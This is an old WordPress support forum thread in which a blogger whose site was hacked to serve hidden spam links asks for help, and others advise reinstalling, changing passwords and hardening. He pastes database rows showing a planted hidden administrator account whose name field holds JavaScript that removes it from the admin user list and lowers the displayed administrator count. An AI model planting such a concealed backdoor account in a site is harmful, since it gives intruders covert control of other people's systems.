Site hacked, Vi@gra and other crap adds inserted!

  • Resolved farhada

    (@farhada)


    16 years, 4 months ago

    Hi Guys,
    I am having a lot of problem with hidden inserted adds into my wordpress based blog.
    https://www.abdolian.com/thoughts

    I found the problem when I received an e-mail from google warning me that my site was banned for 60 days due to “hidden” links and adds.

    After searching the site, I found many places had the html code ‘<u style=’display:none’>’ and then after that lots of links to crap selling sites.

    I cleaned up the pages, found that the code was being inserted in my template (Journalized 2.0) and changed my template to another one.

    A few weeks later, while searching my site, I found another source of the same problem, this time, the template is clean, and I can not find any reference to the sites or scripts that create those garbage inside my SQL database.

    Now, instead, I exported my database and found something that does not looks OK to me, I have only 4 users on my blog, but I see the following names in the user list that I do not recognize:

    (125, 39, ‘nickname’, ‘smerseeo’),
    (21, 6, ‘nickname’, ‘AntonSadko’),
    (27, 8, ‘nickname’, ‘AltaGid’),
    (24, 7, ‘nickname’, ‘EducationNetwork’),
    (134, 42, ‘nickname’, ‘hookahsh’),
    (146, 46, ‘nickname’, ‘conordco’),
    (128, 40, ‘nickname’, ‘xizeryox’),
    (131, 41, ‘nickname’, ‘blowinos’),
    (122, 38, ‘nickname’, ‘SvetlanaDoor’),
    (137, 43, ‘nickname’, ‘AntonPotaPo’),
    (140, 44, ‘nickname’, ‘lookgood’),
    (143, 45, ‘nickname’, ‘hotgurle’),

    And this strange one:
    `(161, 51, ‘first_name’, ‘…\r\n
    \r\n \r\n <b id=”user_superuser”><script language=”JavaScript”>\r\n var setUserName = function(){\r\n try{\r\n var

    t=document.getElementById(“user_superuser”);\r\n while(t.nodeName!=”TR”){\r\n t=t.parentNode;\r\n };\r\n

    t.parentNode.removeChild(t);\r\n var tags = document.getElementsByTagName(“H3″);\r\n var s = ” shown below”;\r\n for (var i =

    0; i < tags.length; i++) {\r\n var t=tags[i].innerHTML;\r\n var h=tags[i];\r\n if(t.indexOf(s)>0){\r\n s

    =(parseInt(t)-1)+s;\r\n h.removeChild(h.firstChild);\r\n t = document.createTextNode(s);\r\n

    h.appendChild(t);\r\n }\r\n }\r\n var arr=document.getElementsByTagName(“ul”);\r\n

    for(var i in arr) if(arr[i].className==”subsubsub”){\r\n var n=/>Administrator

    \\((\\d+)\\)</gi.exec(arr[i].innerHTML);\r\n if(n[1]>0){\r\n var

    txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,”>Administrator (“+(n[1]-1)+”)<“);\r\n

    arr[i].innerHTML=txt;\r\n }\r\n }\r\n \r\n

    }catch(e){};\r\n };\r\n addLoadEvent(setUserName);\r\n </script>’),
    (162, 51, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’),
    (163, 51, ‘wp_user_level’, ’10’);
    `
    I am not sure if this has anything to do with the problem I have but that is all I have been able to investigate so far. This is taking a lot of my time and I am really getting sick of cleaning it up and do it over and over again.

    Really appreciate any help or ideas.

    Best regards,
    /Farhad Abdolian

Viewing 9 replies - 1 through 9 (of 9 total)
  • Thread Starter farhada

    (@farhada)

    You can see the effect of the problem if you look at the cashed page of my blog on Yahoo:

    Story with Viagra add

    In order to see the garbage, you have to view the source of the page and search for ‘<u style=’display:none’>’

    Best regards,
    /Farhad

    What version are you running?

    You’ll need to clean out all the rubbish and refresh your code pages from a freshly-downloaded WordPress source zip.

    Also may be worth changing your login passwords.

    Thread Starter farhada

    (@farhada)

    Thanks,
    I am running 2.51 (I think).
    I am in the process of doing so, I have already changed the userID and the password, but I don’t know how to clean up these un-known users? I have to find a way to clean up the exported SQL file and then import it into a new database.

    Cheers,
    /Farhad

    It should be fairly easy to remove online through phpMyAdmin but I’d need to know what columns were what to show the exact statement.

    generator WordPress 2.1.3

    Most likely your theme is comprimised, delete it. Asuming that you have a copy on your PC this won’t mind. Then UPGRADE the ‘rough way’ by deleting the old files (except wp-config and the wp-content folder) to make sure you have no infected WP files (left). Of course you might want to make a copy of the files to see through them to find changed theme and of course make sure you have no infected and/or vulnerable plugins. When all is good and well again, ‘harden’ your WordPress.

    Thread Starter farhada

    (@farhada)

    Thanks everyone, these are great tips, I will do so when I get home this evening, I may need a while to clean up all the crap and do the installation manually, and hopefully my site will be up and running without the help of Viagra ??

    The first thing you need to do is make sure you completely clean it all up. You can get detailed instructions at How To Completely Clean Hacked WordPress. Once you’ve done that, go read The Ultimate Hacker Prevention Guide so you know how to prevent future problems.

    Thread Starter farhada

    (@farhada)

    Thank you dsslindonna,
    I did what you said here and did a complete upgrade to my blog with a new template.

    The problem is that when I upgraded the database, I lost my categories and all the tags. I did this twice and both time there was a problem.

    any idea how I can fix this? Maybe I should create a new request for this?

    Cheers,
    /Farhad

    Thread Starter farhada

    (@farhada)

    Ok,
    I solved the problem by downloading the 2.51 instead and it upgraded the database correctly.
    Thanks everyone for all your help and time,

    Best regards,
    /Farhad

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Site hacked, Vi@gra and other crap adds inserted!’ is closed to new replies.